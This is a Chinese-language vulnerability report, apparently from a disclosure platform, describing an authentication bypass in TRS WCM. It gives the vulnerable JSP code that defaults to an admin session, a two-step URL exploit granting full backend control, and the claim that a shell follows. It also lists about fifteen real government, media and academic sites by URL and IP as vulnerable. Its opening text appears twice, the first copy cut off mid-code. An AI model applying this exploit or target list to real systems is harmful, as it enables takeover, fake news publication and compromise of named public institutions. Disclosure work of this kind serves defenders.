### 简要描述: ### 详细说明: TRS WCM 后台绕过控制站群系统 通过该漏洞,可直接登录后台操作任意站群。。。 此系统多为大型政府新闻发布站点(新闻源),如一旦被某些(博彩集团)控制,估计后果危害不是一般大。。。 http://123.131.133.150:8080/wcm/ 临沂日报报业集团 http://61.153.63.94/wcm 云和县政府所有发布站点 http://www.cflac.org.cn/wcm 中国文联 http://wcm.xxz.gov.cn:8080/wcm/ 湘西州政府站群 http://www.jscnt.gov.cn/wcm/ 江苏省文化厅 http://www.sccnt.gov.cn 四川省文化厅 http://218.94.123.203/wcm 江苏长安网 http://203.86.89.25/wcm/ 中国书籍出版社 http://www.lfcgs.gov.cn:8080/wcm/ 廊坊车管所 http://iwr.cass.cn/wcm/ 中国社会科学院 http://www.whxinzhou.gov.cn:9090/wcm/ 新洲区人民政府公众网 http://123.131.133.150:8080/wcm/ 琅琊网 http://122.224.174.82:8090/wcm/ 中国美术学院 http://www.qhepb.gov.cn 青海省环保厅 http://211.154.254.113:8080/wcm/ 佛教在线 ……..还有很多,我就不统计了。 在/design_for_interview.jsp中 .....//省略若干代码 ``` int nUserKey = 0; try{ nUserKey = Integer.valueOf(sUserKey); }catch(Exception ex) {} User loginUser = User.findById(nUserKey); if(loginUser == null) { //loinguser为空的情况下,接下来直接赋值loginuser登录名为:admin loginUser = User.findByName("admin"); } if(loginUser == null) { loginUser =...
### 简要描述: ### 详细说明: TRS WCM 后台绕过控制站群系统 通过该漏洞,可直接登录后台操作任意站群。。。 此系统多为大型政府新闻发布站点(新闻源),如一旦被某些(博彩集团)控制,估计后果危害不是一般大。。。 http://123.131.133.150:8080/wcm/ 临沂日报报业集团 http://61.153.63.94/wcm 云和县政府所有发布站点 http://www.cflac.org.cn/wcm 中国文联 http://wcm.xxz.gov.cn:8080/wcm/ 湘西州政府站群 http://www.jscnt.gov.cn/wcm/ 江苏省文化厅 http://www.sccnt.gov.cn 四川省文化厅 http://218.94.123.203/wcm 江苏长安网 http://203.86.89.25/wcm/ 中国书籍出版社 http://www.lfcgs.gov.cn:8080/wcm/ 廊坊车管所 http://iwr.cass.cn/wcm/ 中国社会科学院 http://www.whxinzhou.gov.cn:9090/wcm/ 新洲区人民政府公众网 http://123.131.133.150:8080/wcm/ 琅琊网 http://122.224.174.82:8090/wcm/ 中国美术学院 http://www.qhepb.gov.cn 青海省环保厅 http://211.154.254.113:8080/wcm/ 佛教在线 ……..还有很多,我就不统计了。 在/design_for_interview.jsp中 .....//省略若干代码 ``` int nUserKey = 0; try{ nUserKey = Integer.valueOf(sUserKey); }catch(Exception ex) {} User loginUser = User.findById(nUserKey); if(loginUser == null) { //loinguser为空的情况下,接下来直接赋值loginuser登录名为:admin loginUser = User.findByName("admin"); } if(loginUser == null) { loginUser = User.getSystem(); { ContextHelper.clear(); ContextHelper.initContext(loginUser); request.getSession().setAttribute(LoginHelper.SESSION_NAME_USER,loginUser.getkey()); //直接获取session值传入给admin,至少访问一次之后就获得一个admin的session值了,至此可以直接访问后台文件,任意操作了 ``` exp 如下: 先访问:www.site.com/wcm/app/special/design_for_interview.jsp 再访问:www.site.com/wcm/app/main.jsp 第一步: [<img src="https://images.seebug.org/upload/201405/1611522867329b9c4baabb10670edcca6455744a.jpg" alt="KGPP5KJ})9_H%UE`]J[AY_Q.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1611522867329b9c4baabb10670edcca6455744a.jpg) 第二步: [<img src="https://images.seebug.org/upload/201405/16115254c469f2605605bf5376d2096d2bca63f0.jpg" alt="B4VG086E~D{%993S57GAGK3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16115254c469f2605605bf5376d2096d2bca63f0.jpg) 随意操作任何站点,发布新闻,获取shell都即可。 [<img src="https://images.seebug.org/upload/201405/1611533946f33614407b115f2f9c5ebf75a0d1b4.jpg" alt="G{3%OOGWST~3S2JVKEHFQ{E.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1611533946f33614407b115f2f9c5ebf75a0d1b4.jpg) ### 漏洞证明: 随意操作任何站点(控制站群),发布新闻,获取shell都即可。 [<img src="https://images.seebug.org/upload/201405/1611533946f33614407b115f2f9c5ebf75a0d1b4.jpg" alt="G{3%OOGWST~3S2JVKEHFQ{E.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1611533946f33614407b115f2f9c5ebf75a0d1b4.jpg)